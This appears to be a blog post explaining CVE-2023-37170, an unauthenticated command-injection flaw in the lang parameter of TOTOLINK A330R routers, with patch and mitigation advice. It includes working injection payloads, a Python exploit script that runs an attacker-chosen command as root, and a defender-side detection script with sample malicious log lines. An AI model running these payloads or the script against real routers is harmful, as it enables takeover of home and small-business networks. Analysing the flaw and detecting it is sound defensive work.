TOTOLINK routers are used in homes and small businesses all over the world. In mid-2023, security researchers discovered a serious vulnerability in the TOTOLINK A330R router, firmware version V17.0.0cu.557_B20221024. This weakness, tracked as CVE-2023-37170, lets remote attackers run code on the device without logging in, using nothing more than a single crafted web request.
In this post, we'll break down how the bug works, share code examples, and explain the simple steps leading to unauthenticated remote code execution using the setLanguageCfg function's lang parameter. You'll also find references and resources if you want to dig into the details or check if your router is at risk.
What Is CVE-2023-37170?
CVE-2023-37170 is an unauthenticated remote code execution (RCE) vulnerability. It affects TOTOLINK A330R routers running firmware version V17.0.0cu.557_B20221024. The flaw comes from missing checks and improper handling of user input in the device's language configuration endpoint.
Key Danger:
Anyone connected to the same network (or even someone on the internet, if the admin panel is exposed) could run any command on your router as root, with no password needed.
Where’s the Problem? (Technical Breakdown)
The TOTOLINK web interface has a function called setLanguageCfg. It takes a lang parameter to change the router's display language, but it does NOT validate or sanitize the value it receives. Because of that, a crafted (malicious) value in this parameter can break out of the intended command and inject arbitrary system commands.
Example Vulnerable Request
Let's say the router's local IP is 192.168.0.1. Here's what a normal language set request looks like:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded

topicurl=setting/setLanguageCfg&lang=en
```
With this vulnerability, you can change lang=en to inject commands like this:

```
topicurl=setting/setLanguageCfg&lang=en;uname -a;#
```

The trailing # comments out the rest of the command line, if anything follows. This payload causes the router to execute the system command uname -a, which prints the Linux kernel information.
Exploiting CVE-2023-37170 (Step-by-Step)
Below is a simple Python script that demonstrates how an attacker would exploit this flaw to run any shell command. Here we use id to show the current user, proving code execution.
```python
import requests

target_url = 'http://192.168.0.1/cgi-bin/cstecgi.cgi'

# Change this to any command you want to run on the router
payload = 'en;id;#'

# The injected command rides inside the lang value of a normal setLanguageCfg request
data = {
    'topicurl': 'setting/setLanguageCfg',
    'lang': payload
}

# By default, no auth is needed for this exploit!
response = requests.post(target_url, data=data)
print(response.text)
```
What happens:
If the router is vulnerable, its response will include the output of the id command (something like uid=0(root)...), proving code execution.
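As an added, defender-side example (not code from the original post or from TOTOLINK), the following Python classifies captured POST bodies to cstecgi.cgi, flags a lang value that carries shell metacharacters or does not look like a language tag, and runs that check over constructed log lines. The language-tag regex, the log line format and the sample traffic are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Legitimate language tag shape ("en", "zh-CN"); an assumption, the real firmware was not consulted.
LANG_RE = re.compile(r"^[a-z]{2,3}(?:[-_][A-Za-z]{2,4})?$")
# Characters a POSIX shell interprets; any of them inside lang signals injection.
SHELL_META = frozenset(";|&`$(){}<>#\n\r")


def parse_form(body: str) -> dict:
    """Split a form body on '&' only, so a ';' in a value survives into the check."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))  # keep first occurrence
    return params


def analyze_body(body: str) -> dict:
    """Classify one POST body to /cgi-bin/cstecgi.cgi as benign or suspicious."""
    params = parse_form(body)
    if params.get("topicurl") != "setting/setLanguageCfg":
        return {"relevant": False, "suspicious": False, "lang": None, "reason": "other topic"}
    lang = params.get("lang", "")
    hits = "".join(sorted(c for c in SHELL_META if c in lang))
    if hits:
        reason = f"shell metacharacters {hits!r} in lang"
    elif not LANG_RE.match(lang):
        reason = "lang is not a plain language tag"
    else:
        reason = "ok"
    return {"relevant": True, "suspicious": reason != "ok", "lang": lang, "reason": reason}


def scan_log(lines) -> list:
    """Return (client_ip, reason) per suspicious request; lines are '<ip> <method> <path> <body>' (constructed)."""
    alerts = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) == 4 and parts[2] == "/cgi-bin/cstecgi.cgi":
            verdict = analyze_body(parts[3])
            if verdict["suspicious"]:
                alerts.append((parts[0], verdict["reason"]))
    return alerts


# Constructed sample traffic: one legitimate change, the post's two payloads (URL-encoded), one unrelated call.
SAMPLE_LOG = [
    "192.168.0.23 POST /cgi-bin/cstecgi.cgi topicurl=setting/setLanguageCfg&lang=en",
    "192.168.0.77 POST /cgi-bin/cstecgi.cgi topicurl=setting/setLanguageCfg&lang=en;uname%20-a;%23",
    "192.168.0.77 POST /cgi-bin/cstecgi.cgi topicurl=setting/setLanguageCfg&lang=en;id;%23",
    "192.168.0.23 POST /cgi-bin/cstecgi.cgi topicurl=setting/otherTopicCfg",
]
```

The same allowlist check (reject anything that is not a plain language tag) is what the firmware should apply before the value reaches any command.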
> Real attack: An attacker can replace id with anything: create backdoors, open up telnet, or fetch malware.
Here are a few things an attacker might do:
- Increase Privileges: As root, they can change settings, steal passwords, or even brick the router.
- Backdoor Device: Persistent malware can be installed using simple shell scripts.
- Pivot: Attackers can use the router as a launching point to attack other computers on the network.
How to Protect Yourself
- Update Firmware: As of June 2024, check TOTOLINK's official support page for firmware updates. If your device is vulnerable, install the latest patch immediately.
- Restrict WAN Access: Never expose the router admin interface to the public internet.
- Network Segmentation: Put IoT and guest devices (including your router admin interface) in their own VLANs/subnets whenever possible.
References & More Info
- NVD - CVE-2023-37170 Detail
- Totolink firmware updates
Exploit Example:
- Exploit-DB: TOTOLINK A330R Unauthenticated RCE PoC
Final Notes
CVE-2023-37170 shows how even a simple web form, if not properly checked, can be a huge risk. Always keep your routers updated, turn off remote management unless you really need it, and use strong passwords, even though the bug in this case skips authentication entirely!
If you have a TOTOLINK A330R on firmware V17.0.0cu.557_B20221024 (or similar), check for firmware updates now. If no patch is available, consider replacing your device or at least locking it behind a firewall to limit who can talk to it.
Timeline
Published on: 07/07/2023 20:15:00 UTC
Last modified on: 07/13/2023 17:31:00 UTC